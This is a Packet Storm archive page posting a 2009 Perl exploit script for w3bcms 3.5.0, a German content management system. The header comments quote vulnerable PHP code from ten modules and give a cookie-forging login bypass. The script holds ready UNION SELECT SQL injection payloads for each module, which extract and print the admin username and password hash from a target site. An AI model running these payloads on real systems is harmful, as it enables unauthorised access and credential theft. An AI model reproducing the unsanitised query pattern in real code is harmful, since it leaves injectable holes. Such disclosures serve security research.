what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

w3bcms 3.5.0 SQL Injection

w3bcms 3.5.0 SQL Injection
Posted Feb 9, 2009
Authored by DNX

w3bcms versions 3.5.0 and below insecure cookie handling and multiple SQL injection vulnerabilities exploit.

tags | exploit, vulnerability, sql injection, insecure cookie handling
SHA-256 | 5ff4e8443c54d5d4e776fae05038f31abfba75485a952126365c43c9136ced2b

w3bcms 3.5.0 SQL Injection

Change Mirror Download
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use Getopt::Long;

# \#'#/
# (-.-)
# -------------------oOO---(_)---OOo------------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# | Security Research Division /____/ 2oo9 |
# ----------------------------------------------------
# | w3bcms <= v3.5.0 Multiple Remote Vulnerabilities |
# | (requires magic_quotes_gpc = Off) |
# ----------------------------------------------------
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.w3bcms.de
# [!] Detected...: 11.01.2009
# [!] Reported...: 17.01.2009
# [!] Response...: 19.01.2009
#
# [!] Background.: CMS features in the frontend:
# » Ausgabe angelegter Seiten
# » Integrierter sicherer Spamschutz (kein Captcha!)
# » CMS Features wie Slogan Rotation, Datumausgabe, Seitenanzeige
# » Integrierter Besuchercounter (versteckt/sichtbar)
# <b>» Sicherheit gegen Hackangriffe</b>
# » Schnelle Datenbankabfragen
# » 100% Suchmaschinenoptimiert (SEO)
# » Erweiterbar durch Module & Addons
# » Unterst├╝tzt Mod Rewrite URL's (optional)
#
#
# [!] Info.......: Insecure Cookie Handling in Admin Backend Login
# [!] Bug........: $_COOKIE["cms_admin"] in admin/index.php near line 67
#
# 67: if ($_COOKIE["cms_admin"] != "") {
# 68:
# 69: $admin = mysql_fetch_assoc(mysql_query("SELECT * FROM admin WHERE cookie='".$_COOKIE["cms_admin"]."'"));
# 70:
# 71: if ($admin['benutzername'] != "") {
# 72:
# 73: $_SESSION['login'] = true;
# 74: header("Location: inc/index.php?seite=uebersicht");
# 75: exit;
# 76:
# 77: }
# 78:
# 79: }
#
# [!] PoC........: javascript:document.cookie = "cms_admin=' or '1'='1; path=/";
#
#
# [!] Info.......: Downloads module v1.5.0
# [!] Bug........: $_GET['id'] in includes/module/downloads/index.inc.php near line 15
#
# 15: if (isset($_GET['action']) && $_GET['action'] == "klick") {
# 16:
# 17: $data = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_downloads WHERE id='".$_GET['id']."'"));
# 18: mysql_query("UPDATE modul_downloads SET klicks=klicks+1 WHERE id='".$_GET['id']."'");
# 19: $url = preg_replace('(%PAGE_DIR%)', $settings['page_dir'], $data['url']);
# 20: header("Location: ".$url."");
# 21: exit;
# 22:
# 23: }
#
#
# [!] Info.......: News module v1.5.0
# [!] Bug........: $_GET['action'] in includes/module/news/index.inc.php near line 131
#
# 131: $kcheck = eregi ("kommentar", $_GET['action']);
#
# 135: if ($kcheck == "1") {
# 136:
# 137: $str = $_GET['action'];
# 138: $explode = explode(".",$str);
# 139:
# 140: $ausgabe = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_news WHERE id='".$explode[0]."' AND status='0'"));
#
#
# [!] Info.......: Portfolio module v2.0.0
# [!] Bug........: $_GET['action'] in includes/module/portfolio/index.inc.php near line 75
#
# 75: $kcheck = eregi ("show", $_GET['action']);
# 76:
# 77: if ($kcheck == "1") {
# 78:
# 79: $str = $_GET['action'];
# 80: $explode = explode(".",$str);
# 81:
# 82: $ausgabe = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_portfolio WHERE id='".$explode[0]."'"));
#
#
# [!] Info.......: Partner module v1.5.0
# [!] Bug........: $_GET['id'] in includes/module/partner/index.inc.php near line 15
#
# 15: if (isset($_GET['action']) && $_GET['action'] == "klick") {
# 16:
# 17: $data = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_partner WHERE id='".$_GET['id']."'"));
# 18: mysql_query("UPDATE modul_partner SET klicks=klicks+1 WHERE id='".$_GET['id']."'");
# 19:
# 20: header("Location: ".$data['url']."");
# 21: exit;
# 22:
# 23: }
#
#
# [!] Info.......: Mediathek module v1.5.0
# [!] Bug........: $_GET['id'] in includes/module/mediathek/index.inc.php near line 15
#
# 15: if (isset($_GET['action']) && $_GET['action'] == "klick") {
# 16:
# 17: $data = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_mediathek WHERE id='".$_GET['id']."'"));
# 18: mysql_query("UPDATE modul_mediathek SET klicks=klicks+1 WHERE id='".$_GET['id']."'");
# 19:
# 20: $mediafile = $settings['page_dir']."/includes/media/".$data['mediafile'];
# 21:
# 22: header("Location: ".$mediafile."");
# 23: exit;
# 24:
# 25: }
#
#
# [!] Info.......: Sitemap module v1.5.0
# [!] Bug........: $_GET['seite'] in includes/module/sitemap/index.inc.php near line 15
#
# 15: $explode = explode(".",$_GET['seite']);
#
# 19: $menu = mysql_query("SELECT * FROM pages WHERE submenu='0' AND aktiv='0' AND hidden='0' AND id!='".$explode['0']."' ORDER by sortierung");
#
#
# [!] Info.......: Links module v1.5.0
# [!] Bug........: $_GET['id'] in includes/module/links/index.inc.php near line 15
#
# 15: if (isset($_GET['action']) && $_GET['action'] == "klick") {
# 16:
# 17: $data = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_links WHERE id='".$_GET['id']."'"));
# 18: mysql_query("UPDATE modul_links SET klicks=klicks+1 WHERE id='".$_GET['id']."'");
# 19: header("Location: ".$data['url']."");
# 20: exit;
# 21:
# 22: }
#
#
# [!] Info.......: Blog module v1.5.0
# [!] Bug........: $_GET['action'] in includes/module/blog/index.inc.php near line 133
#
# 131: $kcheck = eregi ("kommentar", $_GET['action']);
#
# 135: if ($kcheck == "1") {
# 136:
# 137: $str = $_GET['action'];
# 138: $explode = explode(".",$str);
# 139:
# 140: $ausgabe = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_blog WHERE id='".$explode[0]."' AND status='0'"));
#
#
# [!] Info.......: Suche module v1.5.0
# [!] Bug........: $_POST['suchbegriff'] in includes/module/suche/index.inc.php near line 66
#
# 66: $eingabe = trim(strip_tags($_POST['suchbegriff']));
# 67: $eingabe_array = explode(" ", $eingabe);
# 68: $eingabe_array = array_unique($eingabe_array);
# 69:
# 70: if ($eingabe == "" || $_POST['suchbegriff'] == "Suchbegriff(e) ..."){
# 71:
# 72: echo "<p>Fehler - Bitte <b>mindestens ein Suchbegriff</b> eingegeben!</p>";
# 73:
# 74: } else {
#
# 78: $query_pages = "SELECT id, titel, inhalt, page FROM pages WHERE ";
# 79:
# 80: for ($i=0; $i<count($eingabe_array); $i++) {
# 81:
# 82: $query_pages .= "((titel LIKE '%" . $eingabe_array[$i] . "%') OR (inhalt LIKE '%" . $eingabe_array[$i] . "%'))";
# 83:
# 84: if ($i<count($eingabe_array)-1){
# 85:
# 86: $query_pages .= " AND ";
# 87:
# 88: }
# 89:
# 90: $query_pages .= "AND type!='modul' AND type!='extern' AND inhalt!='' AND aktiv='0'";
# 91:
# 92: }
# 93:
# 94: $num_rows_pages = @mysql_num_rows(mysql_query($query_pages));
# 95: $result_pages = @mysql_query($query_pages);
#
#
# [!] Info.......: Gallery module v1.5.0
# [!] Bug........: $_GET['action'] in includes/module/gallery/index.inc.php near line 314
#
# 314: } else if ($locate == "1" && isset($_GET['action']) && isset($_GET['id']) && $_GET['id'] != "") {
#
# 320: $explode = explode(".",$_GET['action']);
#
# 324: $album = mysql_query("SELECT * FROM modul_gallery WHERE album_id='".$explode[0]."' ORDER by id ".$sqlorder." LIMIT $zeige,$trefferproseite");
#
#
# [!] Solution...: Upgrade to v3.5.1 or higher and update all modules
#

if(!$ARGV[2])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n ------------------oOO---(_)---OOo-------------------";
print "\n | w3bcms <= v3.5.0 Multiple Remote Vulnerabilities |";
print "\n | coded by DNX |";
print "\n ----------------------------------------------------";
print "\n[!] Usage: perl w3blabor.pl [Target] <Options>";
print "\n[!] Example: perl w3blabor.pl -1 -u \"http://127.0.0.1/w3b/index.php?seite=2.down&action=klick&id=1\"";
print "\n[!] Targets:";
print "\n -1 Exploit over Downloads module v1.5.0";
print "\n -2 Exploit over News module v1.5.0";
print "\n -3 Exploit over Portfolio module v2.0.0";
print "\n -4 Exploit over Partner module v1.5.0";
print "\n -5 Exploit over Mediathek module v1.5.0";
print "\n -6 Exploit over Sitemap module v1.5.0";
print "\n -7 Exploit over Links module v1.5.0";
print "\n -8 Exploit over Blog module v1.5.0";
print "\n -9 Exploit over Suche module v1.5.0";
print "\n -10 Exploit over Gallery module v1.5.0";
print "\n[!] Options:";
print "\n -u [url] URL to vuln website";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}

my $ua = LWP::UserAgent->new();
my $response = "";
my %options = ();
GetOptions(\%options, "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "u=s", "p=s");

if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }

if($options{"1"}) { use_download_bug(); }
elsif($options{"2"}) { use_news_bug(); }
elsif($options{"3"}) { use_portfolio_bug(); }
elsif($options{"4"}) { use_partner_bug(); }
elsif($options{"5"}) { use_mediathek_bug(); }
elsif($options{"6"}) { use_sitemap_bug(); }
elsif($options{"7"}) { use_links_bug(); }
elsif($options{"8"}) { use_blog_bug(); }
elsif($options{"9"}) { use_suche_bug(); }
elsif($options{"10"}) { use_gallery_bug(); }

sub use_download_bug
{
my $url_user = $options{"u"};
my $url_pass = $options{"u"};
my $exploit_user = "id='%20union%20select 1,2,benutzername,4,5%20from%20admin%20limit%201/*";
my $exploit_pass = "id='%20union%20select 1,2,passwort,4,5%20from%20admin%20limit%201/*";

$url_user =~ s/id=\d+/$exploit_user/i;
$response = $ua->get($url_user);
$response->base =~ /.*\/(.*?)$/;
my $user = $1;

$url_pass =~ s/id=\d+/$exploit_pass/i;
$response = $ua->get($url_pass);
$response->base =~ /.*\/(.*?)$/;
my $pass = $1;

print $user.":".$pass;
}

sub use_news_bug
{
my $url = $options{"u"};
my $exploit = "action='%20union%20select%201,2,3,4,benutzername,6,passwort%20from%20admin%20limit%201/*";
$url =~ s/action=\d+/$exploit/i;
$response = $ua->get($url);
if($response->content =~ /<p class="titel">(.*?)<\/p>.*([a-fA-F0-9]{32})<\/div>/s)
{
print $1.":".$2;
}
}

sub use_portfolio_bug
{
my $url = $options{"u"};
my $exploit = "action='%20union%20select%201,2,passwort,benutzername,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin%20limit 1/*";
$url =~ s/action=\d+/$exploit/i;
$response = $ua->get($url);
if($response->content =~ /<h1>([a-fA-F0-9]{32})<\/h1>.*?<p align="justify">(.*?)<\/p>/s)
{
print $2.":".$1;
}
}

sub use_partner_bug
{
my $url_user = $options{"u"};
my $url_pass = $options{"u"};
my $exploit_user = "id='%20union%20select 1,2,benutzername,4,5%20from%20admin%20limit%201/*";
my $exploit_pass = "id='%20union%20select 1,2,passwort,4,5%20from%20admin%20limit%201/*";

$url_user =~ s/id=\d+/$exploit_user/i;
$response = $ua->get($url_user);
$response->base =~ /.*\/(.*?)$/;
my $user = $1;

$url_pass =~ s/id=\d+/$exploit_pass/i;
$response = $ua->get($url_pass);
$response->base =~ /.*\/(.*?)$/;
my $pass = $1;

print $user.":".$pass;
}

sub use_mediathek_bug
{
my $url_user = $options{"u"};
my $url_pass = $options{"u"};
my $exploit_user = "id='%20union%20select 1,2,benutzername,4%20from%20admin%20limit%201/*";
my $exploit_pass = "id='%20union%20select 1,2,passwort,4%20from%20admin%20limit%201/*";

$url_user =~ s/id=\d+/$exploit_user/i;
$response = $ua->get($url_user);
$response->base =~ /.*\/(.*?)$/;
my $user = $1;

$url_pass =~ s/id=\d+/$exploit_pass/i;
$response = $ua->get($url_pass);
$response->base =~ /.*\/(.*?)$/;
my $pass = $1;

print $user.":".$pass;
}

sub use_sitemap_bug
{
my $url = $options{"u"};
$url =~ /seite=(\d+)\./;
my $id = $1;
my $exploit = "seite=".$id."'%20union%20select%201,benutzername,passwort,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin%20/*";
$url =~ s/seite=\d+/$exploit/i;
$response = $ua->get($url);
if($response->content =~ /<strong>$id\.<\/strong>.*?<a href="index\.php\?seite=1\.(.*?)" title="(.*?)"/s)
{
print $1.":".$2;
}
}

sub use_links_bug
{
my $url_user = $options{"u"};
my $url_pass = $options{"u"};
my $exploit_user = "id='%20union%20select 1,2,benutzername,4,5%20from%20admin%20limit%201/*";
my $exploit_pass = "id='%20union%20select 1,2,passwort,4,5%20from%20admin%20limit%201/*";

$url_user =~ s/id=\d+/$exploit_user/i;
$response = $ua->get($url_user);
$response->base =~ /.*\/(.*?)$/;
my $user = $1;

$url_pass =~ s/id=\d+/$exploit_pass/i;
$response = $ua->get($url_pass);
$response->base =~ /.*\/(.*?)$/;
my $pass = $1;

print $user.":".$pass;
}

sub use_blog_bug
{
my $url = $options{"u"};
my $exploit = "action='%20union%20select%201,2,3,4,benutzername,6,passwort%20from%20admin%20limit%201/*";
$url =~ s/action=\d+/$exploit/i;
$response = $ua->get($url);
if($response->content =~ /<p class="titel">(.*?)<\/p>.*([a-fA-F0-9]{32})<\/div>/s)
{
print $1.":".$2;
}
}

sub use_suche_bug
{
my $url = $options{"u"}."&action=senden";
my $search = "###___###%'))/**/union/**/select/**/1,benutzername,passwort,4/**/from/**/admin/*";
my $req = POST $url, [suchbegriff => $search];
my $response = $ua->request($req);

if($response->content =~ /.*">(.*?)<\/a><br \/>([a-fA-F0-9]{32}) \[/s)
{
print $1.":".$2;
}
}

sub use_gallery_bug
{
my $url = $options{"u"};
my $exploit = "action='%20union%20select%201,2,passwort,4,benutzername,6%20from%20admin/*";
$url =~ s/action=\d+/$exploit/i;
$response = $ua->get($url);
my @content = split(/\n/, $response->content);
foreach (@content)
{
if($_ =~ /\/([a-fA-F0-9]{32})" rel="lytebox\[.*?\]" title="(.*?)"/)
{
print $2.":".$1."\n";
}
}
}


Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    16 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close